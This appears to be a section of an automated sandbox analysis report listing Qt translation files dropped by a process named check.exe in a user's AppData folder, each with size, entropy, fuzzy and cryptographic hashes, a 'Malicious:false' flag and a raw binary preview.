                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/il/lAlHekd6hY1MUV6JAlI+rwtbWlMgel3UlIPldkOG:Cwz4+pjUGAIRt6qVUloiB
                                                                                                                                                                                                            MD5:8A1EE3433304838CCD0EBE0A825E84D8
                                                                                                                                                                                                            SHA1:2B3476588350C5384E0F9A51FF2E3659E89B4846
                                                                                                                                                                                                            SHA-256:23457CE8E44E233C6F85D56A4EE6A2CECD87C9C7BDDE6D8B8A925902EED1CD9C
                                                                                                                                                                                                            SHA-512:2D8ACD668DF537E98B27161F9FA49828EB2EB6E9CF41DB38E7F5D31F610D150CD1B580A8AE9B472A4DFDE4D4BF983C24A56293BB911CF5879368664E4D4CF3D2
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......ja....v.....q.t.b.a.s.e._.j.a.....q.t.s.c.r.i.p.t._.j.a.....q.t.m.u.l.t.i.m.e.d.i.a._.j.a... .q.t.x.m.l.p.a.t.t.e.r.n.s._.j.a
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):146
                                                                                                                                                                                                            Entropy (8bit):3.652277257665055
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/rrr/lAlHekcQ/01MUUQMlI+rwtbWlMhQGlIPldkORn:CwCC+1Q/UUpIRt6SBloimn
                                                                                                                                                                                                            MD5:7B2659AF52B824EAC6C169CDD9467EE9
                                                                                                                                                                                                            SHA1:5727109218B222E3B654A8CC9933E970EB7C2118
                                                                                                                                                                                                            SHA-256:4CC1AF37E771F0A43898849CFF2CD42A820451B8D2B2E88931031629D781DB05
                                                                                                                                                                                                            SHA-512:E9475AC80BDBBEFF54F2724A2B6BA76992F18FD1913FD8EE1540A99FD7A112B79FED5A130B6AC6D7460E4420C06354FC6E4CF7770A7C6CBD3EAC1BDAF0082DE5
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......ko....v.....q.t.b.a.s.e._.k.o.....q.t.s.c.r.i.p.t._.k.o.....q.t.m.u.l.t.i.m.e.d.i.a._.k.o... .q.t.x.m.l.p.a.t.t.e.r.n.s._.k.o
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):165383
                                                                                                                                                                                                            Entropy (8bit):4.805977227348512
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:i5v3+zmayloj6yJjhnBAbnrKnGrhA7WgdXclIsooY9i:SvOzAloj6yJ9BA7riGr+7WKXc+s5ui
                                                                                                                                                                                                            MD5:8992B652D1499F5D2F12674F3F875A35
                                                                                                                                                                                                            SHA1:E22766A49612F79156C550D83C6C230345DDA433
                                                                                                                                                                                                            SHA-256:47EB5F97467DF769261421D54A5BEA1131C9FB9B6388791D38BB6574335B64BF
                                                                                                                                                                                                            SHA-512:9B8B6DBFF432F2A46C14BC183A6BAF84ACBF02BF2C5BB8C306C6538FBD9BE1C0A9015BD46728F2F652F9163AFC56B1E16D16EB95D8F7728F3C562AE9F4F1AE1E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......ltB..0X...*..)C...+...|......P....@..9....A..9....B..:....C..:....D..;....E..;....F..<6...G..<....H..=)...I..=....P..>q...Q..>....R..?....S..@f...T..@....U..A\...V..B....W..B....X..C....Y..Cy...]..k....t..........t>......th......t.......pd...;..J'...;.._h...;.......;...{...;..J....;...)...M..l....O...R...O...............}..l9...m..lo......^S..(5..P{..+;..4...+;......+;......+O..4...+O......1...^...E@..?p..F...C...H4......HY......H.......I...D...I@..s...IA..t...IC...2..J.......J....Y..J.......J.......K...9...LD...`..L.......PS......R.......T...q...Zr...`..[`......[`..&@..\....e..\....b.._......._....P..1........E..........5........L..1...O...1...PP......7......../...........$.......$.......,.......y.......y..........K^..............x......8................L...E.......E.......E..*....................%..:....%.........0U.....W......Zo.....^....5.......0..I....0...F...0...|...0.......0.......0..+\...5...}.......... D...g.. D......+....j..,.......,.......<U...+..<U
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):89
                                                                                                                                                                                                            Entropy (8bit):4.156834975253888
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/HzllldQlHekbxplUp1MUTJ+b:Cwv+DIUEb
                                                                                                                                                                                                            MD5:19F1B919BB531E9E12E7F707BEBD8497
                                                                                                                                                                                                            SHA1:46E82683CEA28D877C73A5CE02F965BB1130FC62
                                                                                                                                                                                                            SHA-256:03467738042A15676E504BA02CB326DCDB773B171FADA3CD62B7A0E0564314A0
                                                                                                                                                                                                            SHA-512:901D7B26CAC7A4D0FFDB39A1D25767B5BC71BED4AFBE788D70BF19D4C58A8295167111675AB45E743FDF4768AF874D69417414C01CF23D5C525A3F6C8BF7D21F
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......lv....0.....q.t.b.a.s.e._.l.v.....q.t.s.c.r.i.p.t._.l.v........)....
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):161
                                                                                                                                                                                                            Entropy (8bit):3.8693516202048612
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/5J/p/lAlHekHp/7KlI+rwtbWlM6Tl/z21MUPp/FOlIPldkOjehB:Cwr+26IRt6nFURkloiT
                                                                                                                                                                                                            MD5:D71EA9FEFD97464B178235150EC8759E
                                                                                                                                                                                                            SHA1:61026FE602FD1B8B442A0D341C6BD759EEC75488
                                                                                                                                                                                                            SHA-256:BD7DD0C2CAB119A973DC10C3BFF7499D9728B928B541F86056921B30C8DB78E6
                                                                                                                                                                                                            SHA-512:ECD76A7D8B8D733E635B2BFEA90A4CD387B83D9D8A4EB6D299F59FF22AAA8D617A4C886A825A1CDDD901925C7839E2C18BDD4E0CD84152641922B66B62663F77
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......pl....v.....q.t.b.a.s.e._.p.l.....q.t.m.u.l.t.i.m.e.d.i.a._.p.l.....q.t.s.c.r.i.p.t._.p.l... .q.t.x.m.l.p.a.t.t.e.r.n.s._.p.l............,..
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):70334
                                                                                                                                                                                                            Entropy (8bit):4.732724622610353
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:OKGUuWW+WHjS0gMBd483+Y7bDPs4RHBloLUIltlzAJnx4nnliM1OPlOibLG:JGUuWPuSgm0Jn+n4Mhj
                                                                                                                                                                                                            MD5:6656500F7A28EF820AE9F97FD47FB5BB
                                                                                                                                                                                                            SHA1:CC112B9C9513BCF7497F3417168B4C8A9F7640A9
                                                                                                                                                                                                            SHA-256:2C1E7BBF5168A64B43752DD4C547601C0BDE6D610F8671FA3E3AF38597E84783
                                                                                                                                                                                                            SHA-512:5C3CBFCF86AF6B4D949C1D914CD379E512E73BA350AF661033A386EE7FB981FBFCB43D9A35FDE7656E17BB09F64F1469F84867A780573C3359D645269461D5A6
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......pt_PTB...(...*...9...+...e...]..6....;.......;..-....;..;`...;..};...;.......M..6....O... ...O...w...........}..7....m..7B..........+;......+;..8S..+;..>...+O......+O..8#..H4......H.......J......K.......LD...)..L....}..PS...l..Zr...B..[`...;..[`.....\...kU.._......._.......1...?...............8...............E............,..................p........0...............v...........%...O...%..G........4...0.......0..:....0..y....0..|....0.......0...X...5.......5...... D..=... D..Kn..+....L..,...>...,......<U..z...<U......<.......F...>...F.......H5...4..H5..=...H5..K...H5......f....p..f...1...f...;...f...I...f...|H..f.......f.......l....................b......<...............>.......L ...........`......`..._.......A......2....e...g...e..>D...e..LW................y...,.*.y.....*.y..o..*.y.....*.T..L..*.0..'..*.0....+F...y..+F......+f......+f...C..+.z..0..+.....d.+....p0.+.....R.+.z..0U.+.....u.+....8..+....Ct.+....L..+....y..+.....Z.+......+...pc.+.....+....0..
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):164
                                                                                                                                                                                                            Entropy (8bit):3.984562388316898
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/oZlAlHekF8Op1MUNKJKlI+rwtbWlM4KKIPldkOSxRMugB:CwY+GIUgcIRt61oihM3
                                                                                                                                                                                                            MD5:F7A8C75408B9A34A2B185E76F51B7B85
                                                                                                                                                                                                            SHA1:065E987139C5FB809A6F9CDF3845BCD79707FDBB
                                                                                                                                                                                                            SHA-256:6492B267608C6FB76907BD8FCFC8F1EF57E9F4EBBC2E81ACA81715A88388F94A
                                                                                                                                                                                                            SHA-512:E768C5B438EC899801B22B1325F2244ACCC5E7C2EC5D270F510BC3CBC2D9A0536949C026DB7FB5862835E506A9F2020DEB2CC4001E7011FF974324542734F855
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......ru....v.....q.t.b.a.s.e._.r.u.....q.t.s.c.r.i.p.t._.r.u.....q.t.m.u.l.t.i.m.e.d.i.a._.r.u... .q.t.x.m.l.p.a.t.t.e.r.n.s._.r.u........)......,..
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):157
                                                                                                                                                                                                            Entropy (8bit):3.7731953311404336
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/3xRlAlHekE8lgp1MUM8lMlI+rwtbWlM5UllyIPldkOfll6kchn:CwS0+t8CIUM86IRt6KUlsoi2CVh
                                                                                                                                                                                                            MD5:24C179481B5EF574F33E983A62A34D53
                                                                                                                                                                                                            SHA1:0A67F1ED8CA4A5182F504806F8D47D499789F2D2
                                                                                                                                                                                                            SHA-256:B6ADFFD889FF96BF195CB997327E7D7005A815CAD67823FA6915A19C2D9BB668
                                                                                                                                                                                                            SHA-512:4757F3693120DAB2FBB7BCF1734EA20B3E3D9056B4B4E934A3129D660CFDC6C58B230459DB55912AF24AD5692BD221830BE0FF91E41D3EECD9439E79AC23FFE6
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......sk....v.....q.t.b.a.s.e._.s.k.....q.t.s.c.r.i.p.t._.s.k.....q.t.m.u.l.t.i.m.e.d.i.a._.s.k... .q.t.x.m.l.p.a.t.t.e.r.n.s._.s.k...........
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):228428
                                                                                                                                                                                                            Entropy (8bit):4.726953418955661
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:9zQH0hOtgmiAZu0eeAEv+v49JnnSmICgr3n7jhCQUeinqyU5UggtRLGrQ2LZO+Y1:RpUsSpGr36wsR
                                                                                                                                                                                                            MD5:D35A0FE35476BE8BD149CEE46E42B5E9
                                                                                                                                                                                                            SHA1:9F3C85C115A283E5230D1EEAD84C8CB73A71FA03
                                                                                                                                                                                                            SHA-256:C44E0313A9414CC0E490B65B0C036FA11BCA959353B228886547BC2C8492034F
                                                                                                                                                                                                            SHA-512:BEEB1751882AF081E80BE93F7464D4C6322B724EFA2CBD3E1CBE709181D380C1C57E770FA962BB706D6FCF4A8CB393E3F6E187C1F604F8CEEFB201CA3200BD1C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......slB..<....*.......+.......@...C...A.......B...<...C.......D...2...E.......F...d...G.......H...W...I.......P.......Q.......R.......S...x...T.......U...n...V...%...W.......X.......Y.......]..g~...t...V.......f..................................;..G....;..[....;...q...;..ia...;... ...M..g....O.......O.......[..,e...........}..g....m..h........Q..(5......+;..2...+;...b..+;...i..+O..2...+O...4..1......E@......F.......H4......HY...%..H.......I.......I@......IA...9..IC......J...6...J.......J.......J...^...K...7...LD......L....n..PS...U..R.......T....=..Zr......[`...V..[`......\...!,..\...8U.._..."b.._.../h..1.......E...9......4...............5........e...................$...<...$..Z....[.......,.......y...L...y..].......H.......@.......J.......6........~..........E...O...E..+....E...~..............,1...%..8r...%...........^..............................5.......0..Gx...0.......0..P....0..h....0.......0.......5...^.......... D...... D......+....`..,.......,...-...<U
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):65851
                                                                                                                                                                                                            Entropy (8bit):4.7906769989650515
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:4u6DkpgyKmRmG15mGM6iFPi6Q/qTlOQZY2dKN8gKw:4u6DotUG1sGMZPi6Q/qTlO2Y2YKw
                                                                                                                                                                                                            MD5:0E85E0E0E7DDFE3D4BDE302F27047F9C
                                                                                                                                                                                                            SHA1:AE59348E0C2E4F86F99DA6CF5DAB3B7E92504B7C
                                                                                                                                                                                                            SHA-256:4B4B6FF7FD237C9DA0301B4946132E68653D15EB5FAF38E4C5FBFEBB12DD97F7
                                                                                                                                                                                                            SHA-512:8CAAB6C61E9FA26A3A289A9E4DC515D157B3092D6D4ED43861220261BD2B7CC79B35B52F9ADE4EF558B5385B37EAC14575420DD55C475F435BB95B6C1E2561B6
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`...B.......*.......+...i...]..6....;.......;..-f...;..:;...;..t....;.......M..64...O.......O...........q...}..6\...m..6........(..+;......+;..7...+;..=...+O......+O..7c..H4......H.......J.......K....F..LD...+..L.......PS...N..Zr......[`...7..[`...N..\...h4.._....J.._....k..1...>...............7........}......D............,...........*......i....................................%.......%..Fc.......6...0.......0..9....0..q....0..t....0.......0.......5.......5...... D..<}.. D..I...+.......,...=X..,.......<U..r...<U...n..<.......F...=...F....F..H5......H5..<...H5..J4..H5......f.......f...1V..f...:f..f...H;..f...t&..f.......f.......l..................8......;z..............<.......Je.......6...`...&...`...!.......9......1....e.......e..=....e..J..............g...y.....*.y.../.*.y..h..*.y.....*.T..J..*.0..'[.*.0...K.+F...q..+F.....+f......+f...A..+.z../..+.......+....i`.+.....X.+.z../..+.....S.+....7..+....Bi.+....K..+....q..+.......+......+...i..+.....+....0..F0i.....G.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):110
                                                                                                                                                                                                            Entropy (8bit):3.630483009136986
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/7zl9lAlHekDN/01MULV4LlI+rwtbWlM+N:Cw5+wUGRIRt6n
                                                                                                                                                                                                            MD5:16CDF5B9D48B0F795D532A0D07F5C3A0
                                                                                                                                                                                                            SHA1:6E403C9096B3051973E2B681DFEBBC8DD024830D
                                                                                                                                                                                                            SHA-256:F574A2CFD4715885C3DBDF5AE60995252673BD94FDAA9586F7E0586F6C1AC0EE
                                                                                                                                                                                                            SHA-512:36A0431368010157EA8A45DCB00458076CCFFC08B37E443DEBD1AAD4A30C6080803337725A7A3DCBF2B410DC7BE89CEAF6C07C46F876E4EF5B08159E3BF38E6D
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......tr....R.....q.t.b.a.s.e._.t.r.....q.t.s.c.r.i.p.t._.t.r.....q.t.m.u.l.t.i.m.e.d.i.a._.t.r
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):164
                                                                                                                                                                                                            Entropy (8bit):4.021402900389864
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/ZlRlAlHekCczOp1MUKUt7KlI+rwtbWlM/cFKIPldkONRMugB:CwUl0+rjIUKUcIRt6M/oioM3
                                                                                                                                                                                                            MD5:9B101363343847FE42167183320C03F0
                                                                                                                                                                                                            SHA1:F0DF2CFF913E588B7CADFDABBF69F4F632B2F96A
                                                                                                                                                                                                            SHA-256:F1621E680E1642F9463E4B07E7E78B50F9A7BDB7C321D7302039CB3405CBDEA4
                                                                                                                                                                                                            SHA-512:DA14FDF8DB514902733CAAC492293873351C595EBBE0ACB0849BECE24AB822602EE64D01051F1426CD1FC13A95D8607302CF9B515D9806FDD3BD047087DE447C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......uk....v.....q.t.b.a.s.e._.u.k.....q.t.s.c.r.i.p.t._.u.k.....q.t.m.u.l.t.i.m.e.d.i.a._.u.k... .q.t.x.m.l.p.a.t.t.e.r.n.s._.u.k........)......,..
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):117347
                                                                                                                                                                                                            Entropy (8bit):5.8593733369029195
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:51dXW89nqEFu54aekvRzHHSVuf8j2+/xc3lhnbsfdAoz/w:v9qEFeLekvRznSVHJG3lhn+djY
                                                                                                                                                                                                            MD5:0D02F0DE5A12BCB338B7042DFBDAACF3
                                                                                                                                                                                                            SHA1:B7C10D249D8986AD8C6939B370407D07227A39F5
                                                                                                                                                                                                            SHA-256:28CDE75D7B32C81FEF1D4630C37B79A61DEC24B357632FF00D6365A57D8BE43B
                                                                                                                                                                                                            SHA-512:21F02EBA36B4411921EA3C70310B8E454E8FC2B8F09957FD6A63B71689DC381F7A5E2C3BDF2810734D659AB43D8A7BD46EF6436ECC52F75C71B5F5C313365444
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......zhB..+....*.......+.......@.......A...8...B.......C.......D.......E...V...F.......G...L...H.......I...9...P.......Q...e...R...^...S.......T...T...U.......V...|...W.......X...o...Y.......]..4 ...;...2...;..,....;..8....;.......;.......M..4H...O.......O...........#...}..4p...m..4........N..(5......+;...f..+;..6Y..+;..<...+O...8..+O..6'..1......E@......F....Y..H4..."..HY..J...H.......I.......J.......J.......K....5..LD..._..L......PS...V..Q....6..R...N...W..../..Zr.....[`.....[`......\...lU.._......._....L..1...<........j......6...............B........I...$..K....$.......,...g...y...3.......A......r...........................9..L7......;w...E..5b...E...G.......5...%.......%..D........`......*........................0.......0..8W...0..}y...0...6...0.......0.......5.......5...... D..:... D..J...+....R..,...;...,......<U..~...<U......<......F...;...F......H5...i..H5..:...H5..Jk..H5...w..VE...[..f....u..f...0X..f...9...f...E...f.......f.......f....j..g....A..l.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):141
                                                                                                                                                                                                            Entropy (8bit):3.7198292994386235
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/0N6xg/Rl/gl+kNXDelHrwtbWlMwTolIPldkOfDn:CwOO2+g6Mt63oloiUn
                                                                                                                                                                                                            MD5:ED4135D705AEF3D97F8BF6B8FF11F09C
                                                                                                                                                                                                            SHA1:308E2B8F74B863A61AD0B68F4A18ED06965EBEAA
                                                                                                                                                                                                            SHA-256:751ECDA0C33E061D91241268357FBD2F6B7F70A1116E714F28D22EFD61EC7A1A
                                                                                                                                                                                                            SHA-512:B6E6D00553A9C427130129B9D30E862028E549F372A832F0F05747C8E2A79E443F4932EC3AE177537C8BA00D26B5B6CB97D5B35426AB5229F6A468CA485BE0B1
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......zh_TW....n.....q.t.b.a.s.e._.z.h._.T.W...$.q.t.m.u.l.t.i.m.e.d.i.a._.z.h._.T.W...&.q.t.x.m.l.p.a.t.t.e.r.n.s._.z.h._.T.W
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):160017
                                                                                                                                                                                                            Entropy (8bit):5.35627970915292
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:XGlAMfkX1M0RdaCkR8lfv8vtc8EFrVYA2I4AJZWEWgHg1C8COvzHKHC6Jp9NV0V7:XUr0RACkIwDEpV1Lgf1ubtw3Bb
                                                                                                                                                                                                            MD5:A7E4D0BA0FC5DF07F62CC66EC9878979
                                                                                                                                                                                                            SHA1:21FD131B23BDD1BBA7BBB86F3ED5C83876F45638
                                                                                                                                                                                                            SHA-256:E03FE68D83201543698FD7FE267DD5DFC5BFD195147E74FF2F19AC3491401263
                                                                                                                                                                                                            SHA-512:D9E6B10506FCF20B5B783F011908083D9DF6C5DF88E21B10D07F53A01AD6506A4B921C85335A25BAE54E27BAD7D01B6E240D58FDEEAABC7FF32014EC120C2ECF
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......arB..2....*.......+.......@.......A.......B..._...C......D.......E......F.......G... ...H...D...I...h...P...C...Q...g...R......S.......T.......U.......V...x...W......X.......Y.......]..'=...s......t...........]...........;..'....;..(....;.......;.......M..'e...O.......O...9...........}..'........C...=......m..'....t..........!o..(5...Z..+;..5u..+;..c...+O......1...!...D@...8..E@.....H4...,..HY..QI..H.......IC......J....1..J.......J.......LD......L.......PS......QR...R..R...V2..T.......U....]..X.......Zr.....[`......\....t..]x......_......._.......yg......1...6....E..8V..............C............................$..RN...[...0...,.......y.......y...................K...........9..R....E.."............z.......................%..F;...D...[..................................!....5.......0...I...0.......0...5...0..#....5.......5...p..............W}.. D..(... D..P=..+.......<U......<U......<.......H5..(...H5..P...L.......VE......VE......V....B..f...JJ..f.......f.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):165337
                                                                                                                                                                                                            Entropy (8bit):5.332219158085151
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:9ULiyUxPoT6qx+J7FJlaaMJnxjqxq+0Uiff0mbVeb7wiEwYuYqDKBkKHMXHCIMll:9ULpIVFnpwUiEujw27ncUQUz
                                                                                                                                                                                                            MD5:660413AD666A6B31A1ACF8F216781D6E
                                                                                                                                                                                                            SHA1:654409CDF3F551555957D3DBCF8D6A0D8F03A6C5
                                                                                                                                                                                                            SHA-256:E448AC9E3F16C29EB27AF3012EFE21052DAA78FABFB34CD6DFF2F69EE3BD3CDB
                                                                                                                                                                                                            SHA-512:C6AE4B784C3D302D7EC6B9CE7B27DDAF00713ADF233F1246CD0475697A59C84D6A86BAA1005283B1F89FCC0835FD131E5CF07B3534B66A0A0AA6AC6356006B8F
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......bg_BGB../....*..,....+..."...@...]...A.......B.......C.......D...P...E...!...F.......G.......H.......I.......P.......Q.......R...A...S...e...T.......U.......V.......W...1...X...U...Y...y...]..,....s...,...t...................P...;..+....;..-E...;..!....;..+....M..,Y...O...,...O...........*...}..,............=...Q...m..,....t...|......>...(5..1...+;..<...+;..o...+O...r..1...>...D@......E@......H4......HY..[...H.......IC......J....E..J....X..J.......LD......L....L..PS......QR.."...R...`...T....X..U.......X.......Zr...q..[`...`..\.......]x......_......._....T..yg.....1...=....E..?...............L(.......(...............'...$..\....[.......,...I...y...!...y...................S...........9..]%...E..5p...........z..!q...................%..O....D..................D.....8......:......?....5...&...0.......0.. ....0...c...0..5....5.......5..................b:.. D..-... D..Z...+.......<U......<U...0..<.......H5..-...H5..[...L.......VE..#a..VE..;...V.......f...T...f...!..
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):210159
                                                                                                                                                                                                            Entropy (8bit):4.666388181115542
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:P/DVhdlafzvZfeW+6kXEVjSVPzC3ceKdP2:xYf7UW+WjwP2
                                                                                                                                                                                                            MD5:B383F6D4B9EEA51C065E73ECB95BBD23
                                                                                                                                                                                                            SHA1:DD6C2C4B4888B0D14CEBFC86F471D0FC9B07FE42
                                                                                                                                                                                                            SHA-256:52E94FCC9490889B55812C5433D009B44BDC2DC3170EB55B1AF444EF4AAE1D7F
                                                                                                                                                                                                            SHA-512:9401940A170E22CE6515E3C1453C563D93869A3C3686C859491A1F8795520B61BF3F0BFE4687A7380C0CC0C75E25559354FDB5CEF916AF4C5B6CD9661464A54A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......caB..7....*.......+.../...@..:P...A..:t...B..:....C..:....D..;=...E..<....F..<Z...G..<~...H..<....I..<....P..>....Q..>....R..?....S..?R...T..?v...U..?....V..?....W..@....X..@<...Y..@`...]../....s..1....t..........2s......#p...;.......;../....;..W....;..e+...M../3...O.......O..9.......J....}../]......8....=..9....m../....t..9Y.......S..(5..lB..+;.._...+;...=..+O..U...1.......D@..:...E@..?...H4...J..HY..~...H..."...IC...0..J....W..J....0..J.......LD..!...L...!f..PS..)...QR.."...R.......T...9~..U...9...U...z...X...>...Zr..E...[`...e..\...LD..]x..7U.._......._...M...yg..f...1...a....E..c....7.........U.......p........b.......4.......K...$.......[.......,.......y.......y...................^...........9...:...E...s...... (...z..":.......d......!....%..tQ...D.."......."......2......ve.....y...........5..#H...0...\...0..W+...0..';...0.......5..(....5..........)s.......... D..0w.. D..}...+...1...<?..5x..<U......<U..5...<...6@..H5..0...H5..~...L...9...VE..$...V...SV..f.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):174701
                                                                                                                                                                                                            Entropy (8bit):4.87192387061682
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:5WjuhX0CVRaakGjW9E8SSOQfX/JlwVOMxrboRPqWxXfQvO7zjBf:5iFGj1QfXr8Gd
                                                                                                                                                                                                            MD5:C57D0DE9D8458A5BEB2114E47B0FDE47
                                                                                                                                                                                                            SHA1:3A0E777539C51BB65EE76B8E1D8DCE4386CBC886
                                                                                                                                                                                                            SHA-256:03028B42DF5479270371E4C3BDC7DF2F56CBBE6DDA956A2864AC6F6415861FE8
                                                                                                                                                                                                            SHA-512:F7970C132064407752C3D42705376FE04FACAFD2CFE1021E615182555F7BA82E7970EDF5D14359F9D5CA69D4D570AA9DDC46D48CE787CFF13D305341A3E4AF79
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
